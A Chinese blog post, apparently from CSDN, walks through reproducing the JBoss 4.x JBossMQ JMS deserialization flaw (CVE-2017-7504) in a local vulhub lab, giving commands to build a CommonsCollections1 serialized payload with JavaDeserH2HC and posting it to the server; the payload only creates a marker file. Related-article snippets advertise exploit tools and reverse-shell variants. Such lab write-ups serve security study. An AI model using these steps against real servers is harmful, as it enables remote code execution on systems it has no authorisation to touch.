JBoss 4.x JBossMQ JMS(CVE-2017-7504)漏洞复现

最新推荐文章于 2024-05-17 10:33:39 发布
最新推荐文章于 2024-05-17 10:33:39 发布
阅读量392 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞 http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44504968/article/details/108464832
版权

JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

文章目录

漏洞原理

Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

实验环境

一、靶机:
系统:ubuntu搭建的测试靶场
IP:192.168.88.129
二、攻击机:
系统:kali
IP:192.168.88.130

漏洞环境

启动JBoss AS 4.0.5:
在这里插入图片描述
环境启动后,可在浏览器页面成功访问http://192.168.88.129:8080/:
在这里插入图片描述

漏洞复现

一、参考利用JavaDeserH2HC工具,编译并生成序列化数据
下载工具命令:
#git clone https://github.com/joaomatosf/JavaDeserH2HC

编译并生成序列化数据
2
其中:
#javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java 初始化工具
#java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap “touch /tmp/success” 生成序列化恶意数据文件

注:在执行中出现:-bash:javac:未找到命令
解决方法:apt-get install default-jdk

二、进行网站访问,实现漏洞利用
网站访问:
在这里插入图片描述
–data-binary 意为以二进制的方式post数据

验证:
进入容器shell(docker相当于小型虚拟机),发现success
在这里插入图片描述

参考链接:
https://vulhub.org/#/environments/jboss/CVE-2017-7504/
https://www.cnblogs.com/iamver/p/11282928.html

俗半
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JBossMQJMS 反序列化漏洞CVE-2017-7504漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504漏洞利用工具,方便我们进行漏洞利用getshell。
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504 已亲自复现
qq_42430287的博客
12-19 1113
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504 已亲自复现
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504
yang1234567898的博客
04-22 1604
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 漏洞复现 启动环境 docker-compose up -d 该漏洞出现在/jbossmq-httpil/HTTPServerI.
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504复现
KaNongDD的博客
09-18 1376
前言 写这篇文章是因为,现在CSDN环境太恶心人了,全是水文章或者收费文章。完全没几个是自己亲自去复现的。 准备工作(实在不懂了加我微信问我:14777115517,但还是希望你们先动手弄) 需要的工具链接: https://pan.baidu.com/s/1BmDo1vYX6DTZeI8wcnxFZQ 提取码:4bzf 该漏洞出现在/jbossmq-httpil/HTTPServerILServlet请求中,利用ysoserial的eCommonsCollections5利用链。 必看:.
JBoss 4.x JBossMQ JMS反序列化(CVE-2017-7504
Kevin's Blog
06-08 835
文章目录一、漏洞介绍1.1 漏洞简介1.2 影响版本1.3 利用路径二、环境搭建三、操作过程四、防御措施 一、漏洞介绍 1.1 漏洞简介   JBoss是一个基于J2EE的开放源代码应用服务器,用户占有量较大,JBoss实现过程的JMS over HTTP Invocation Layer的HttpServerILServlet.java文件存在反序列化漏洞。 1.2 影响版本 JBoss<4.x 1.3 利用路径 /jbossmq-httpil/HTTPServerILServlet 二、环境
CVE-2017-7504JBoss 4.x JBossMQ JMS 反序列化漏洞
weixin_45253622的博客
12-09 700
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504) vulhub官方复现https://vulhub.org/#/environments/jboss/CVE-2017-7504/ 漏洞描述:Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ 实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
CVE-2017-12149漏洞利用工具,针对该漏洞快速方便的进行利用。
jboss-threads-3.1.0.Final-API文档-中文版.zip
05-09
赠送jar包:jboss-threads-3.1.0.Final.jar; 赠送原API文档:jboss-threads-3.1.0.Final-javadoc.jar; 赠送源代码:jboss-threads-3.1.0.Final-sources.jar; 赠送Maven依赖信息文件:jboss-threads-3.1.0.Final....
ECShop 2.x/3.x SQL注入/任意代码执行 漏洞复现
qq_44504968的博客
09-22 1211
ECShop 2.x/3.x SQL注入/任意代码执行 文章目录ECShop 2.x/3.x SQL注入/任意代码执行漏洞原理实验环境漏洞环境漏洞复现 漏洞原理 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞 ,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现
Adobe ColdFusion(CVE-2010-2861)文件读取漏洞复现
qq_44504968的博客
09-23 1144
Adobe ColdFusion文件读取漏洞CVE-2010-2861)漏洞原理实验环境漏洞环境漏洞复现 漏洞原理 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。 Adobe ColdFusion 8、9版本中
Ubuntu下搭建vulhub靶机
qq_44504968的博客
08-26 1012
Ubuntu下搭建vulhub靶机前言一、更新源二、安装vulhub1.安装docker2.安装vulhub 前言 最近用Ubuntu21搭建vulhub,中途在搭建docker时遇到了报错,就记录下 一、更新源 因为速度原因,一般会使用国内的阿里云、清华云等 vim /etc/apt/source.list deb http://mirrors.aliyun.com/ubuntu/ bionic main restricted universe multiverse deb http://m..
Atlassian JIRA服务器模板注入漏洞CVE-2019-11581)
qq_44504968的博客
04-06 976
Atlassian JIRA服务器模板注入漏洞CVE-2019-11581)一、漏洞原理二、漏洞风险等级三、漏洞影响范围四、实验环境4.1靶机:4.2攻击机:五、漏洞复现六、漏洞修复方案 一、漏洞原理 Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 因atlassian-jira/WEB-INF/classes/com/atlassian/jira/web/action/user/Contact
ElasticSearch(CVE-2014-3120)命令执行漏洞复现
qq_44504968的博客
09-23 904
ElasticSearch(CVE-2014-3120)命令执行漏洞复现漏洞原理实验环境漏洞环境漏洞复现 漏洞原理 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 知识点普及: 1、Elasticsearch,是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java语言开发的,并作为Apache许可条款下
Weblogic漏洞复现
qq_44504968的博客
03-28 631
CVE-2020-14882 Weblogic 未授权绕过RCE一、漏洞原理二、漏洞风险等级三、漏洞影响范围四、实验环境4.1靶机:4.2攻击机:五、漏洞复现六、漏洞修复方案 一、漏洞原理 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,最
ms17-010永恒之蓝漏洞复现
qq_44504968的博客
04-21 307
ms17-010永恒之蓝漏洞复现一、漏洞原理二、漏洞风险等级三、漏洞影响范围四、实验环境4.1靶机:4.2攻击机:五、漏洞复现 一、漏洞原理 二、漏洞风险等级 三、漏洞影响范围 四、实验环境 4.1靶机: 4.1.1、系统:windows 7 4.1.2、IP:192.168.22.140 4.2攻击机: 系统:kali IP:192.168.22.xx 五、漏洞复现 5.1.1、利用msf查看靶机是否存在漏洞 5.1.2、若存在漏洞,利用msf工具拿到shell ...
python实现nacos服务注册和HTTP探活
最新发布
alim2012的博客
05-17 214
如果使用nacos-sdk-python,需要按照下面的链接修改源码的bug。
CVE-2017-7504
07-28
CVE-2017-7504是指JBoss AS 4.x及之前版本中的一个反序列化漏洞,该漏洞存在于JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件中。攻击者可以利用特制的序列化数据利用该漏洞执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值